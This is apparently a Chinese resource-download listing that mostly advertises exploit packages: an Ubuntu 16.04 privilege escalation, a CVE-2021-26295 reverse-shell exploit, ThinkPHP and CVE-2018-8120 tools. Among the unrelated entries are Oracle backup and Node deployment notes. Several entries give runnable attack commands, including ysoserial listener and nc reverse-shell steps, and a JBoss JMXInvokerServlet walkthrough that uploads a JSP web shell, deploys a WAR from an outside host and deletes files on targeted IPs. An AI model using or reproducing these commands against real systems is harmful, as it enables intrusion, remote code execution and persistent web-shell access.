乌班图16.04的本地提权exp,亲测可用,分享给大家用于学习练习使用,用于解决github下载地址https://github.com/lphfyq/ubuntu16-39772.zip-exp/raw/master/39772.zip不可用情况
2021-04-29 09:00:06 6KB ubuntu
1
FTM-100D_EXP_Firmware_Update_0205.zip
2021-04-29 01:43:34 13.89MB FTM-100D_EXP_Fir
1
CVE-2021-26295 CVE-2021-26295 EXP可成功反弹壳 本文以及工具仅限于技术共享,不能用于非法用途,否则会导致一切后果自行承担。 触发命令执行EXP 1. VPS启动RMI监听9999端口 java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 ' [要执行的命令] ' 2. VPS启动nc监听64444端口 nc -lvp 64444 3.执行python脚本 python3 cve-2021-26295_exp.py 示例
2021-04-27 22:26:56 190KB Python
1
Oracle配置par参数文件做备份,可以对tables=(表1,表2...),query='where rownum<=100'做导出行数控制,#exp parfile=jpf.par
2021-04-23 19:04:09 2KB oracle exp par rownum<100
1
Thinkphp全网GUI EXP 2020 HackingClub 线下典藏版,亲测真实有效可用,如有侵权,请联系CSDN管理员删除即可
2021-04-13 18:00:09 347KB Thinkphp全网GUI HackingClub 线下典藏版
CVE-2018-8120
2021-04-13 18:00:07 165KB EXP
1
1,申请云服务器 2,在宝塔面板安装 PM2 1. 安装依赖 2. 配置项目(项目根目录,启动文件,名称) 3,创建站点 1. 设置IP或者域名 4,把项目上传到站点目录 尽量不要上传node_moudls, 使用宝塔终端 cd /www/wwwroot/xxx/ 然后自己 npm i) 5,修改站点配置文件(设置里面) //添加这句 设置代理代码 location / { proxy_pass http://127.0.0.1:3008; //自己本地的IP和端口 } 6,进入数据库 bin 目录 导出 需要使用的数据库 **导出某个数据库:** my
2021-04-11 14:26:47 38KB ex exp expr
1
ANTI_EXP_RING ANTI_EXP_RING源面。
2021-04-03 22:05:18 2KB C++
1
1. 查看系统名称 java -jar jboss_exploit_fat.jar -i http://123.232.119.98:9009/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName 2. 查看系统版本 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion 3.远程创建文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository store myname.war index .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean $content$内容是同目录下的shell.jsp文件内容 即:将shell.jsp文件上传到服务器上,最终部署的war访问: http://192.168.7.84:10081/myname/index.jsp 如果有mynameok 表示部署成功 使用client.htm客户端进行连接即可(需要修改ip等信息) 4.远程部署war java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://scriptsgenie.com/demo/test.war 获得shell地址: http://192.168.7.84:10081/test/shell.jsp 5.远程删除文件D:\jboss\server\default\deploy\management\myname.war\index.jsp文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 6.支持输入用户名和密码 带验证的情况 java -jar jboss_exploit_fat.jar -u name -p password -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 7.支持代理模式 java -jar jboss_exploit_fat.jar -P http://127.0.0.1:8080 -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp
2021-04-01 14:43:07 4.92MB jbss 网安 反序列化 jml
1
Exploit 编写系列教程 1 ~ 11
2021-04-01 12:11:32 12.59MB 看雪 exp 溢出 二进制
1